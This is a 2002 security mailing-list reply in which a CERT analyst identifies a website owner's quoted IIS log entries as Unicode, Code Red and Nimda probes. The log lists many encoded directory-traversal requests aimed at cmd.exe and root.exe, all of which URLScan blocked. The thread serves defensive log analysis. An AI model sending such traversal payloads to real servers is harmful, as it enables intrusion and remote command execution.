They look like unicode + codered and nimda attacks.

Regards, 
---------
Muhammad Faisal Rauf Danka

Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
voice: 92-021-111-GEMNET

Vice President
Pakistan Computer Emergency Responce Team (PakCERT)
web: www.pakcert.org

Chief Security Analyst
Applied Technology Research Center (ATRC)
web: www.atrc.net.pk
voice: 92-21-4980523 92-21-4974781 

"Great is the Art of beginning, but Greater is the Art of ending. "

------BEGIN GEEK CODE BLOCK----
Version: 3.1
GCS/CM/P/TW d- s: !a C++ B@ L$ S$ U+++ 
P+ L+++ E--- W+ N+ o+ K- w-- O- PS PE- Y- 
PGP+ t+ X R tv+ b++ DI+ D G e++ h! r+ y+
------END GEEK CODE BLOCK------


--- Craig Brauckmiller <[EMAIL PROTECTED]> wrote:
>
>
>Hello all and forgive my ignorance in this area.
>
>We are in the process of bringing our website in house.  It 
>was being hosted
>externally
>The site is almost up and I was just poking at the logs and 
>was intrigued by
>what I saw.
>
>Below is a snippet from the logs.  Can anyone tell by 
>looking at it:
>
>1.  What type of vulnerabilities were they looking for?
>2.  Does the fact the it says <Rejected by urlscan> imply 
>that URLScan from M$
>is loaded.  I didn't do this myself...thats why I'm curious.
>3.  What is the best course of action in regards to the 
>individual attempting
>these activities?  I traced the IP back to RoadRunner.  
>Should I call their
>customer service and complain or am I just pissing in the 
>wind?
>4.  I did run the IIS Lockdown wizard.  Is that sufficient 
>for most types of
>attacks?  What other tools should I consider running?
>
>#Fields: date time c-ip cs-username s-ip s-port cs-method 
>cs-uri-stem
>cs-uri-query sc-status sc-win32-status cs(User-Agent)
>2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/scripts/root.exe 404 123 -
>2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/MSADC/root.exe 404 123 -
>2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/c/winnt/system32/cmd.exe 404 123 -
>2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/d/winnt/system32/cmd.exe 404 123 -
>2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/scripts/..%255c../winnt/system32/cmd.exe 404 123 -
>2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/_vti_bin/..%255c../..%255c../..%
>255c../winnt/system32/cmd.exe 404 123 -
>2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/_mem_bin/..%255c../..%255c../..%
>255c../winnt/system32/cmd.exe 404 123 -
>2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%
>1c../..%c1%1c../winnt/system32/cmd.exe
>
>404 123 -
>2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 123 -
>2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 123 -
>2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/scripts/..%c0%af../winnt/system32/cmd.exe 404 123 -
>2002-05-10 02:27:05 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 123 -
>2002-05-10 02:27:09 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/scripts/..%%35%63../winnt/system32/cmd.exe 404 123 -
>2002-05-10 02:27:11 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/scripts/..%%35c../winnt/system32/cmd.exe 404 123 -
>2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 123 -
>2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 
>GET /<Rejected-By-UrlScan>
>~/scripts/..%252f../winnt/system32/cmd.exe 404 123 -
>
>Thanks so much for this great list.
>
>Craig Brauckmiller

_____________________________________________________________
---------------------------
[ATTITUDEX.COM]
http://www.attitudex.com/
---------------------------

_____________________________________________________________
Promote your group and strengthen ties to your members with [EMAIL PROTECTED] by 
Everyone.net  http://www.everyone.net/?btn=tag

Reply via email to